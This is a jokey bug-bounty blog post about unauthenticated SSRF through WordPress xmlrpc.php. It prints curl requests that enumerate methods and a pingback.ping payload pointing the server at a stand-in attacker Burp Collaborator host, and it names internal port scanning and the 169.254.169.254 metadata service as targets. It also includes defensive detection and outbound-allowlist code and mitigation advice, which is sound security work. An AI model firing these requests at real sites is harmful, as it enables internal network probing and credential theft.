🛰️ So… I Made a Server Call Me Back. Unauthenticated SSRF via XML‑RPC

One fine evening, while sipping coffee stronger than my will to live, I accidentally made a server talk to me. Literally.

☕ The Setup: XML‑RPC aka WordPress's Forgotten Child

Ever stumble upon a file named xmlrpc.php and think, "Oh look, a rusty gate to the backend world"?

That's exactly what I thought. And like every other bored hacker with caffeine in their blood, I poked it using curl.

Request:

curl -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  --data '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>'

Response:

<methodResponse>
  <params>
    <param><value><string>Hello!</string></value></param>
  </params>
</methodResponse>

Server said hello. I said: "Nice to meet you, let's be friends… maliciously." 😈

🔍 Enumerating Methods Like a Nosy Neighbor

Naturally, I wanted to know what tricks this server had.

Request:

curl -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  --data '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>'

Response: a long list of methods came back, including:

pingback.ping
metaWeblog.newPost
wp.uploadFile
blogger.deletePost
wp.getUsers
...

When you realize the server knows more methods than you do in Python.

🚨 The Vulnerability That Hit Different: pingback.ping

So what does pingback.ping do? It takes a source URL and a target URL, and the server fetches the source URL to check whether that page really links to the target. In other words, it makes the server send a request to whatever URL you hand it.

Imagine calling your friend to check if someone linked your blog — now imagine your friend is a vulnerable server that calls any URL you give it.

So I handed it a very harmless link (my Burp Collaborator domain).

Payload:

curl -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  --data '<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://attacker.burpcollaborator.net</string></value></param>
    <param><value><string>https://target.com/blog/hello-world</string></value></param>
  </params>
</methodCall>'
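On the defending side, the same request shape is what you look for in logs. The following is an added example, not code from the original post: a small standard-library detector that parses captured XML-RPC request bodies, pulls out the method name and top-level parameters, and flags calls such as pingback.ping so the source URL can be reviewed. The watched-method table, the `Finding` type and the sample bodies are constructed for this demo.

```python
# Added example (not from the original post): parse captured XML-RPC request
# bodies and flag methods worth a closer look. Standard library only; the
# watched-method table and sample bodies below are constructed for the demo.
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Optional

# Methods worth alerting on and why. pingback.ping is the SSRF primitive from
# the post; the other two are common abuse targets on the same endpoint.
WATCHED_METHODS = {
    "pingback.ping": "server-side fetch of a caller-supplied URL (SSRF)",
    "system.multicall": "many calls batched into one request",
    "wp.getUsersBlogs": "accepts credentials, used for password guessing",
}


@dataclass
class Finding:
    method: str
    reason: str
    params: list = field(default_factory=list)


def _value_text(value_el: ET.Element) -> str:
    """Scalar inside <value>: XML-RPC allows <value>text</value> or
    <value><string>text</string></value>. Structs and arrays come back empty."""
    child = next(iter(value_el), None)
    src = child if child is not None else value_el
    return (src.text or "").strip()


def parse_method_call(body: str) -> tuple[str, list[str]]:
    """Extract methodName and the top-level scalar params of a methodCall.
    stdlib ElementTree is used for brevity; a collector that parses untrusted
    XML at scale should use a hardened parser such as defusedxml."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    name_el = root.find("methodName")
    if name_el is None or not (name_el.text or "").strip():
        raise ValueError("methodCall without methodName")
    params = [_value_text(v) for v in root.findall("./params/param/value")]
    return name_el.text.strip(), params


def inspect_request(body: str) -> Optional[Finding]:
    """Finding for a watched method, None for benign or unparsable bodies."""
    try:
        method, params = parse_method_call(body)
    except (ET.ParseError, ValueError):
        return None  # malformed bodies are counted elsewhere, not scored here
    reason = WATCHED_METHODS.get(method)
    if reason is None:
        return None
    return Finding(method, reason, params)


def scan(bodies: list[str]) -> list[Finding]:
    """Run the detector over a batch of captured request bodies."""
    return [f for f in (inspect_request(b) for b in bodies) if f is not None]


# Constructed sample bodies (not captured traffic).
SAMPLE_BODIES = [
    '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName>'
    '<params></params></methodCall>',
    '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params>'
    '<param><value><string>http://pingback-source.example/</string></value></param>'
    '<param><value><string>https://blog.example/hello-world</string></value></param>'
    '</params></methodCall>',
    '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
    '<params><param><value><array><data/></array></value></param></params></methodCall>',
    '<methodCall><methodName>pingback.ping',  # truncated body, must not crash
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_BODIES):
        print(f"{finding.method}: {finding.reason}; params={finding.params}")
```

Run as a script it prints one line per flagged body; the pingback.ping finding carries the source URL as its first parameter, which is the value to feed into an outbound-URL policy check.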

📡 And It Responded… Loudly

My Burp Collaborator popped off like:

  • ✅ DNS Lookup from one IP
  • ✅ HTTP request from another IP
  • ✅ Extra DNS queries from a third

Bro, the server was working harder than me on a Monday morning.

😱 Impact: Why You Shouldn't Trust Strangers

With this unauthenticated SSRF (Server‑Side Request Forgery), I could:

  • Port scan internal services like a nosy neighbor
  • Try to reach metadata services (http://169.254.169.254)
  • Abuse it to pivot further
  • Chain it with more vulnerabilities (like RCE, who knows!)

All without logging in. Just plain XML and desperation.

🔒 Recommendations (aka How to Make Your Server Less Friendly)

  • Disable pingback.ping unless you really need it
  • Block xmlrpc.php entirely if unused
  • Use allowlists on outbound HTTP requests
  • Monitor internal traffic like you monitor memes during work
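The "allowlist on outbound HTTP requests" item is the one that directly stops a pingback fetch from reaching 169.254.169.254 or an internal port. Below is an added example of such a policy, not code from the original post or from WordPress: it accepts only http/https on ports 80 and 443, optionally restricts the hostname, resolves the name and requires every returned address to be globally routable. The resolver is injectable so the check can run offline; the `fake_resolve` table, its hostnames and its records are constructed for the demo (8.8.8.8 and 1.1.1.1 are used only as known public addresses).

```python
# Added example (not from the original post): allowlist policy for outbound
# fetches such as pingback verification. Standard library only; the fake
# resolver and the hostnames below are constructed for the demo.
import ipaddress
import socket
from typing import Callable, Iterable, Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_public_ip(ip_str: str) -> bool:
    """True only for globally routable addresses. Loopback, RFC 1918, CGNAT,
    link-local (which includes 169.254.169.254) and documentation ranges fail,
    and IPv4-mapped IPv6 forms are unwrapped first so ::ffff:10.0.0.1 cannot
    slip past as "an IPv6 address"."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global


def resolve_all(host: str) -> list[str]:
    """Every address a name resolves to. The policy must pass for all of them,
    so a name that mixes public and private records is refused."""
    try:
        ipaddress.ip_address(host)
        return [host]  # already a literal address
    except ValueError:
        pass
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_outbound_url(
    url: str,
    resolve: Callable[[str], list[str]] = resolve_all,
    allowed_hosts: Optional[Iterable[str]] = None,
) -> Tuple[bool, str]:
    """Return (allowed, reason) for a URL the server is about to fetch."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    host = parts.hostname  # lower-cased, brackets and userinfo stripped
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if allowed_hosts is not None and host not in set(allowed_hosts):
        return False, f"host {host} not in allowlist"
    try:
        addrs = resolve(host)
    except OSError:  # socket.gaierror is a subclass
        return False, f"could not resolve {host}"
    if not addrs:
        return False, f"{host} has no addresses"
    for addr in addrs:
        if not is_public_ip(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


# Constructed DNS records so the demo runs offline.
FAKE_DNS = {
    "pingback-source.example": ["8.8.8.8"],
    "metadata.internal": ["169.254.169.254"],
    "mixed.example": ["1.1.1.1", "10.0.0.5"],
}


def fake_resolve(host: str) -> list[str]:
    """Stand-in for resolve_all that only knows the constructed records."""
    if host in FAKE_DNS:
        return list(FAKE_DNS[host])
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        raise OSError(f"constructed resolver has no record for {host}")


def demo() -> dict:
    urls = [
        "http://pingback-source.example/post",
        "http://metadata.internal/latest/meta-data/",
        "http://169.254.169.254/",
        "http://[::ffff:169.254.169.254]/",
        "http://mixed.example/",
        "gopher://pingback-source.example/",
        "http://pingback-source.example:8080/",
    ]
    return {u: check_outbound_url(u, resolve=fake_resolve) for u in urls}


if __name__ == "__main__":
    for url, (ok, why) in demo().items():
        print(f"{'ALLOW' if ok else 'DENY '} {url}  ({why})")
```

One caveat the code cannot fix on its own: the check resolves the name once, so the HTTP client that performs the fetch has to connect to the address that was validated (or re-run the check on the resolved address and on every redirect), otherwise a name that changes between check and connect gets around the policy.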

☕ Final Thoughts

If your server still supports XML‑RPC in 2025, and especially pingback.ping, it's basically saying:

"I'm open to conversations… even with attackers."

Patch up. Audit your WordPress setups. And never underestimate old endpoints with long names.

Also: drink your coffee. The bugs won't find themselves.

— AIwolfie

Bug Bounty SSRF WordPress XML-RPC Security